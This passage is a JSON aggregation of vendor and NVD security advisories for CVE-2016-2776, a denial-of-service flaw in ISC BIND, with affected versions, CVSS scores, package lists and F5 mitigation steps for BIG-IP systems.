{"id": "USN-3088-1", "bulletinFamily": "unix", "title": "Bind vulnerability", "description": "It was discovered that Bind incorrectly handled building responses to \ncertain specially crafted requests. A remote attacker could possibly use \nthis issue to cause Bind to crash, resulting in a denial of service.", "published": "2016-09-27T00:00:00", "modified": "2016-09-27T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "href": "https://ubuntu.com/security/notices/USN-3088-1", "reporter": "Ubuntu", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2016-2776"], "cvelist": ["CVE-2016-2776"], "type": "ubuntu", "lastseen": "2020-07-02T11:33:11", "edition": 5, "viewCount": 17, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-2776"]}, {"type": "f5", "idList": ["F5:K18829561", "SOL18829561"]}, {"type": "centos", "idList": ["CESA-2016:1944", "CESA-2016:1945"]}, {"type": "suse", "idList": ["SUSE-SU-2016:2405-1", "SUSE-SU-2016:2399-1", "OPENSUSE-SU-2016:2406-1", "SUSE-SU-2016:2401-1"]}, {"type": "fedora", "idList": ["FEDORA:1BA44608799E", "FEDORA:91B566078C1B", "FEDORA:12A2D604E441", "FEDORA:22EA060879B9", "FEDORA:20D61604D0DA", "FEDORA:DBB0760600CD"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310809926", "OPENVAS:1361412562310106291", "OPENVAS:1361412562310871665", "OPENVAS:1361412562310872068", "OPENVAS:1361412562310882565", "OPENVAS:1361412562310809906", "OPENVAS:1361412562310809948", "OPENVAS:1361412562310882563", "OPENVAS:1361412562310810263", "OPENVAS:1361412562310871664"]}, {"type": "freebsd", "idList": ["C8D902B1-8550-11E6-81E7-D050996490D0"]}, {"type": "slackware", "idList": ["SSA-2016-271-01"]}, {"type": "redhat", "idList": ["RHSA-2016:2099", "RHSA-2016:1945", "RHSA-2016:1944"]}, {"type": "zdt", "idList": ["1337DAY-ID-25325"]}, {"type": "amazon", "idList": ["ALAS-2016-751"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/DOS/DNS/BIND_TSIG"]}, {"type": "nessus", "idList": ["PHOTONOS_PHSA-2017-0021_BINDUTILS.NASL", "FEDORA_2016-CCA77DAF70.NASL", "FEDORA_2016-76BD94CA9E.NASL", "SUSE_SU-2016-2405-1.NASL", "BIND9_9104_P3.NASL", "ORACLELINUX_ELSA-2016-1944.NASL", "REDHAT-RHSA-2016-1944.NASL", "ALA_ALAS-2016-751.NASL", "SUSE_SU-2016-2401-1.NASL", "UBUNTU_USN-3088-1.NASL"]}, {"type": "archlinux", "idList": ["ASA-201609-29"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:138960"]}, {"type": "exploitdb", "idList": ["EDB-ID:40453"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:09762DB0197BBAAAB6FC79F24F0D2A74"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:DE630CF7E67472C9EFB46DD5E3E29439"]}, {"type": "aix", "idList": ["BIND_ADVISORY13.ASC"]}, {"type": "threatpost", "idList": ["THREATPOST:D7A38F9093BCFFE3B9F1544BCF241462"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3680-1:5E275", "DEBIAN:DLA-645-1:784F3"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-2615", "ELSA-2016-1945", "ELSA-2016-2094", "ELSA-2016-1944", "ELSA-2016-2093"]}, {"type": "gentoo", "idList": ["GLSA-201610-07"]}], "modified": "2020-07-02T11:33:11", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2020-07-02T11:33:11", "rev": 2}, "vulnersScore": 5.4}, "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "16.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "bind9", "packageVersion": "1:9.10.3.dfsg.P4-8ubuntu1.1"}, {"OS": "Ubuntu", "OSVersion": "12.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "bind9", "packageVersion": "1:9.8.1.dfsg.P1-4ubuntu0.17"}, {"OS": "Ubuntu", "OSVersion": "14.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "bind9", "packageVersion": "1:9.9.5.dfsg-3ubuntu0.9"}], "scheme": null}

{"cve": [{"lastseen": "2021-02-02T06:28:05", "description": "buffer.c in named in ISC BIND 9 before 9.9.9-P3, 9.10.x before 9.10.4-P3, and 9.11.x before 9.11.0rc3 does not properly construct responses, which allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a crafted query.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-09-28T10:59:00", "title": "CVE-2016-2776", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2776"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:oracle:linux:6", "cpe:/o:oracle:solaris:10.0", "cpe:/a:isc:bind:9.11.0", "cpe:/o:oracle:vm_server:3.4", "cpe:/o:oracle:vm_server:3.3", "cpe:/a:isc:bind:9.10.1", "cpe:/o:oracle:vm_server:3.2", "cpe:/a:isc:bind:9.10.2", "cpe:/a:isc:bind:9.10.4", "cpe:/o:hp:hp-ux:11.31", "cpe:/a:isc:bind:9.10.0", "cpe:/o:oracle:linux:7", "cpe:/o:oracle:linux:5.0", "cpe:/a:isc:bind:9.9.9", "cpe:/a:isc:bind:9.10.3", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2016-2776", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2776", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:isc:bind:9.10.3:p1:*:*:*:*:*:*", "cpe:2.3:o:oracle:vm_server:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.11.0:b1:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:11.31:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.3:p4:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.2:p4:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.1:b1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.0:b2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.4:p3:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.3:p3:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.1:p2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.2:p3:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.2:rc1:*:*:*:*:*:*", "cpe:2.3:o:oracle:vm_server:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:vm_server:3.4:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.2:p1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.4:p2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.2:p2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.2:b1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.1:b2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.0:a1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.0:b1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.11.0:a1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.3:b1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.3:p2:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:6:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.0:p1:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.9.9:p3:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.11.0:b2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.0:p2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.0:a2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.11.0:b3:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.11.0:a3:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.3:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.10.1:p1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.11.0:a2:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2019-06-28T14:42:33", "bulletinFamily": "software", "cvelist": ["CVE-2016-2776"], "description": "\nF5 Product Development has assigned ID 616864 (BIG-IP), ID 617867 (BIG-IQ and iWorkflow), and ID 617869 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H618448 on the **Diagnostics** &gt; **Identified** &gt; **High** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 13.0.0 \n12.1.2 \n11.6.1 HF2 \n11.5.4 HF4| High| BIND \nBIG-IP AAM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 \n11.6.1 HF2 \n11.5.4 HF4| High| BIND \nBIG-IP AFM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 \n11.6.1 HF2 \n11.5.4 HF4| High| BIND \nBIG-IP Analytics| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1| 13.0.0 \n12.1.2 \n11.6.1 HF2 \n11.5.4 HF4| High| BIND \nBIG-IP APM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 13.0.0 \n12.1.2 \n11.6.1 HF2 \n11.5.4 HF4| High| BIND \nBIG-IP ASM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 13.0.0 \n12.1.2 \n11.6.1 HF2 \n11.5.4 HF4| High| BIND \nBIG-IP DNS| 12.0.0 - 12.1.1| 13.0.0 \n12.1.2| High| BIND \nBIG-IP Edge Gateway| 11.2.1 \n10.2.1 - 10.2.4| None| High| BIND \nBIG-IP GTM| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 11.6.1 HF2 \n11.5.4 HF4| High| BIND \nBIG-IP Link Controller| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 13.0.0 \n12.1.2 \n11.6.1 HF2 \n11.5.4 HF4| High| BIND \nBIG-IP PEM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.2 \n11.6.1 HF2 \n11.5.4 HF4| High| BIND \nBIG-IP PSM| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| None| High| BIND \nBIG-IP WebAccelerator| 11.2.1 \n10.2.1 - 10.2.4| None| High| BIND \nBIG-IP WOM| 11.2.1 \n10.2.1 - 10.2.4| None| High| BIND \nBIG-IP WebSafe| 12.0.0 - 12.1.1 \n11.6.0 - 11.6.1| 13.0.0 \n12.1.2 \n11.6.1 HF2| High \n\n| BIND \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.1.1| None| Low| BIND \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| BIND \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| BIND \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| BIND \nBIG-IQ ADC| 4.5.0| None| Low| BIND \nBIG-IQ Centralized Management| 5.1.0 \n4.6.0| None| Low| BIND \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Low| BIND \nF5 iWorkflow| 2.0.0| None| Low| BIND \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nBIG-IP\n\nTo mitigate this vulnerability, you can use the DNS Caching and DNS Express features instead of BIND. In addition, to mitigate the issue on the management IP address, restrict access to that IP address to trusted hosts only.\n\nTo mitigate the issue on the self IP address, do not allow port 53 on the self IP address. If your self IP address is configured to use the default allow, you can remove that port from the list of the default allowed services.\n\nEnsuring that TCP/UDP port 53 is not allowed as a default service (allow-service default)\n\n 1. Log in to the Traffic Management Shell (**tmsh**) by typing the following command: \n\ntmsh\n\n 2. List the default services allowed by the **allow-service default **setting, by typing the following command: \n\nlist net self-allow\n\nThe command output appears similar to the following example:\n\nnet self-allow { \ndefaults { \nospf:any \ntcp:domain \ntcp:f5-iquery \ntcp:https \ntcp:snmp \ntcp:ssh \nudp:520 \nudp:cap \nudp:domain \nudp:f5-iquery \nudp:snmp \n} \n}\n\n 3. If TCP port 53 (tcp:53 or tcp:domain) or UDP port 53 (udp:53 or udp:domain) are listed as a default allowed port, you should delete the entries by typing the following command: \n\nmodify net self-allow defaults delete { tcp:domain udp:domain }\n\n 4. Save the configuration by typing the following command: \n\nsave sys config\n\nDisabling the Use BIND Server on BIG-IP option on the DNS profile\n\nTo mitigate the issue on the DNS profile, you can disable the **Use BIND Server on BIG-IP** option by performing the following procedure:\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **DNS **&gt;** Delivery** &gt; **Profiles **&gt; **DNS** or **Local Traffic** &gt;** Profiles** &gt;** Services** &gt; **DNS**.\n 3. Select the applicable DNS profile.\n 4. From the **Use BIND Server on BIG-IP** option, select **Disabled.**\n 5. Click **Finished**.\n\n**Important:** Disabling the BIND server can impact DNS configurations that use BIND as a fallback method (return to DNS) for resolution.\n\nBIG-IP GTM/Link Controller\n\nVerifying whether you have configured any listener addresses to share a self IP (BIG-IP GTM/Link Controller)\n\nListener addresses that share a self IP address will expose the system to this vulnerability. To verify whether you have configured a listener address to share a self IP, run the following commands:\n\n * tmsh list /net self address\n * tmsh list /gtm listener address\n\nIf you have configured a listener address to share a self IP, you should reconfigure the address to use a unique IP address.\n\nChoosing a load balancing method other than Return to DNS for the GTM pool (BIG-IP GTM)\n\n**Important**: If DNS Express is not configured, BIG-IP GTM or Link Controller systems will respond to **A**, **AAAA**, and **CNAME** type DNS record queries only. Queries for other types of records, such as **NS** or **MX**, will fail. \n\nTo mitigate the issue on the GTM pool, you can use a load balancing method other than **Return to DNS** by performing the following procedure:\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **DNS **&gt;** GSLB **&gt;** Pools.**\n 3. From the **Pool List **menu, select the applicable name.\n 4. Click the **Members** tab.\n 5. Choose a load balancing method other than **Return to DNS**.\n 6. Click **Update**.\n\nBIG-IQ, Enterprise Manager, or iWorkflow systems\n\nTo mitigate this vulnerability for the BIG-IQ system, the Enterprise Manager system, or the iWorkflow system, you should not configure any of these systems to function as a DNS server.\n\n**Impact of action:** Performing the suggested mitigation should not have a negative impact on your system.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K17329: BIG-IP GTM name has changed to BIG-IP DNS](<https://support.f5.com/csp/article/K17329>)\n", "edition": 1, "modified": "2018-02-06T01:01:00", "published": "2016-09-27T21:51:00", "id": "F5:K18829561", "href": "https://support.f5.com/csp/article/K18829561", "title": "BIND vulnerability CVE-2016-2776", "type": "f5", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2016-09-29T21:23:19", "bulletinFamily": "software", "cvelist": ["CVE-2016-2776"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to SOL21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems.\n\nMitigation\n\nBIG-IP\n\nTo mitigate this vulnerability, you can use the DNS Caching and DNS Express features instead of BIND. In addition, to mitigate the issue on the management IP address, restrict access to that IP address to trusted hosts only.\n\nTo mitigate the issue on the self IP address, do not allow port 53 on the self IP address. If your self IP address is configured to use the default allow, you can remove that port from the list of the default allowed services.\n\n**_Ensuring that TCP/UDP port 53 is not allowed as a default service (allow-service default)_**\n\n 1. Log in to the Traffic Management Shell (**tmsh**) by typing the following command: \n\ntmsh\n\n 2. List the default services allowed by the **allow-service default **setting, by typing the following command: \n\nlist net self-allow\n\nThe command output appears similar to the following example:\n\nnet self-allow { \ndefaults { \nospf:any \ntcp:domain \ntcp:f5-iquery \ntcp:https \ntcp:snmp \ntcp:ssh \nudp:520 \nudp:cap \nudp:domain \nudp:f5-iquery \nudp:snmp \n} \n}\n\n 3. If TCP port 53 (tcp:53 or tcp:domain) or UDP port 53 (udp:53 or udp:domain) are listed as a default allowed port, you should delete the entries by typing the following command: \n\nmodify net self-allow defaults delete { tcp:domain udp:domain }\n\n 4. Save the configuration by typing the following command: \n\nsave sys config\n\nDisabling the Use BIND Server on BIG-IP option on the DNS profile\n\nTo mitigate the issue on the DNS profile, you can disable the **Use BIND Server on BIG-IP** option by performing the following procedure:\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **DNS **&gt;** Delivery** &gt; **Profiles **&gt; **DNS** or **Local Traffic** &gt;** Profiles** &gt;** Services** &gt; **DNS.**\n 3. Select the applicable DNS profile.\n 4. From the **Use BIND Server on BIG-IP** option, select **Disabled.**\n 5. Click **Finished**.\n**Important:** Disabling the BIND server can impact DNS configurations that use BIND as a fallback method (return to DNS) for resolution.\n\nBIG-IP GTM/Link Controller\n\nVerifying whether you have configured any listener addresses to share a self IP (BIG-IP GTM/Link Controller) \n \nListener addresses that share a self IP address will expose the system to this vulnerability. To verify whether you have configured a listener address to share a self IP, run the following commands:\n\n * tmsh list /net self address\n * tmsh list /gtm listener address\n\nIf you have configured a listener address to share a self IP, you should reconfigure the address to use a unique IP address.\n\nChoosing a load balancing method other than Return to DNS for the GTM pool (BIG-IP GTM)\n\n**Important**: If DNS Express is not configured, BIG-IP GTM or Link Controller systems will respond to **A**, **AAAA**, and **CNAME** type DNS record queries only. Queries for other types of records, such as **NS** or **MX**, will fail. \n \nTo mitigate the issue on the GTM pool, you can use a load balancing method other than **Return to DNS** by performing the following procedure:\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **DNS **&gt;** GSLB **&gt;** Pools.**\n 3. From the **Pool List **menu, select the applicable name.\n 4. Click the **Members** tab.\n 5. Choose a load balancing method other than **Return to DNS**.\n 6. Click **Update**.\n\n \nBIG-IQ, Enterprise Manager or iWorkflow systems\n\nTo mitigate this vulnerability for the BIG-IQ system, the Enterprise Manager system, or the F5 iWorkflow system, you should not configure any of these systems to function as a DNS server.\n\n**Impact of action:** Performing the suggested mitigation should not have a negative impact on your system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL17329: BIG-IP GTM name has changed to BIG-IP DNS\n", "modified": "2016-09-29T00:00:00", "published": "2016-09-27T00:00:00", "id": "SOL18829561", "href": "http://support.f5.com/kb/en-us/solutions/public/k/18/sol18829561.html", "type": "f5", "title": "SOL18829561 - BIND vulnerability CVE-2016-2776", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "centos": [{"lastseen": "2019-12-20T18:26:33", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "**CentOS Errata and Security Advisory** CESA-2016:1945\n\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name\nSystem (DNS) protocols. BIND includes a DNS server (named); a resolver library\n(routines for applications to use when interfacing with DNS); and tools for\nverifying that the DNS server is operating correctly.\n\nSecurity Fix(es):\n\n* A denial of service flaw was found in the way BIND constructed a response to a\nquery that met certain criteria. A remote attacker could use this flaw to make\nnamed exit unexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2016-2776)\n\nRed Hat would like to thank ISC for reporting this issue.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-September/034131.html\n\n**Affected packages:**\nbind97\nbind97-chroot\nbind97-devel\nbind97-libs\nbind97-utils\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-1945.html", "edition": 3, "modified": "2016-09-28T14:01:06", "published": "2016-09-28T14:01:06", "href": "http://lists.centos.org/pipermail/centos-announce/2016-September/034131.html", "id": "CESA-2016:1945", "title": "bind97 security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-20T18:25:39", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "**CentOS Errata and Security Advisory** CESA-2016:1944\n\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name\nSystem (DNS) protocols. BIND includes a DNS server (named); a resolver library\n(routines for applications to use when interfacing with DNS); and tools for\nverifying that the DNS server is operating correctly.\n\nSecurity Fix(es):\n\n* A denial of service flaw was found in the way BIND constructed a response to a\nquery that met certain criteria. A remote attacker could use this flaw to make\nnamed exit unexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2016-2776)\n\nRed Hat would like to thank ISC for reporting this issue.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-September/034130.html\nhttp://lists.centos.org/pipermail/centos-announce/2016-September/034132.html\nhttp://lists.centos.org/pipermail/centos-announce/2016-September/034135.html\n\n**Affected packages:**\nbind\nbind-chroot\nbind-devel\nbind-libbind-devel\nbind-libs\nbind-libs-lite\nbind-license\nbind-lite-devel\nbind-pkcs11\nbind-pkcs11-devel\nbind-pkcs11-libs\nbind-pkcs11-utils\nbind-sdb\nbind-sdb-chroot\nbind-utils\ncaching-nameserver\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-1944.html", "edition": 3, "modified": "2016-09-28T14:48:21", "published": "2016-09-28T14:00:32", "href": "http://lists.centos.org/pipermail/centos-announce/2016-September/034130.html", "id": "CESA-2016:1944", "title": "bind, caching security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "suse": [{"lastseen": "2016-09-27T20:38:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "The nameserver bind was updated to fix a remote denial of service\n vulnerability, where a crafted packet could cause the nameserver to abort.\n (CVE-2016-2776, bsc#1000362)\n\n", "edition": 1, "modified": "2016-09-27T21:10:06", "published": "2016-09-27T21:10:06", "id": "SUSE-SU-2016:2399-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00026.html", "type": "suse", "title": "Security update for bind (critical)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-09-27T20:38:59", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "The nameserver bind was updated to fix a remote denial of service\n vulnerability, where a crafted packet could cause the nameserver to abort.\n (CVE-2016-2776, bsc#1000362)\n\n", "edition": 1, "modified": "2016-09-27T21:10:55", "published": "2016-09-27T21:10:55", "id": "SUSE-SU-2016:2401-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00027.html", "type": "suse", "title": "Security update for bind (critical)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-09-28T10:13:03", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "The nameserver bind was updated to fix a remote denial of service\n vulnerability, where a crafted packet could cause the nameserver to abort.\n (CVE-2016-2776, bsc#1000362)\n\n This update was imported from the SUSE:SLE-12-SP1:Update update project.\n\n", "edition": 1, "modified": "2016-09-28T11:09:52", "published": "2016-09-28T11:09:52", "id": "OPENSUSE-SU-2016:2406-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00030.html", "type": "suse", "title": "Security update for bind (critical)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-09-27T20:38:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "The nameserver bind was updated to fix a remote denial of service\n vulnerability, where a crafted packet could cause the nameserver to abort.\n (CVE-2016-2776, bsc#1000362)\n\n", "edition": 1, "modified": "2016-09-27T22:09:45", "published": "2016-09-27T22:09:45", "id": "SUSE-SU-2016:2405-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00029.html", "type": "suse", "title": "Security update for bind (critical)", "cvss": {"score": 0.0, "vector": "NONE"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly. ", "modified": "2016-10-01T00:53:36", "published": "2016-10-01T00:53:36", "id": "FEDORA:DBB0760600CD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: bind-9.10.4-2.P3.fc24", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. This package set contains only export version of BIND libraries, that are used for building ISC DHCP. ", "modified": "2016-10-03T17:23:31", "published": "2016-10-03T17:23:31", "id": "FEDORA:20D61604D0DA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: bind99-9.9.9-2.P3.fc24", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly. ", "modified": "2016-10-24T23:52:28", "published": "2016-10-24T23:52:28", "id": "FEDORA:91B566078C1B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: bind-9.10.4-2.P3.fc23", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": 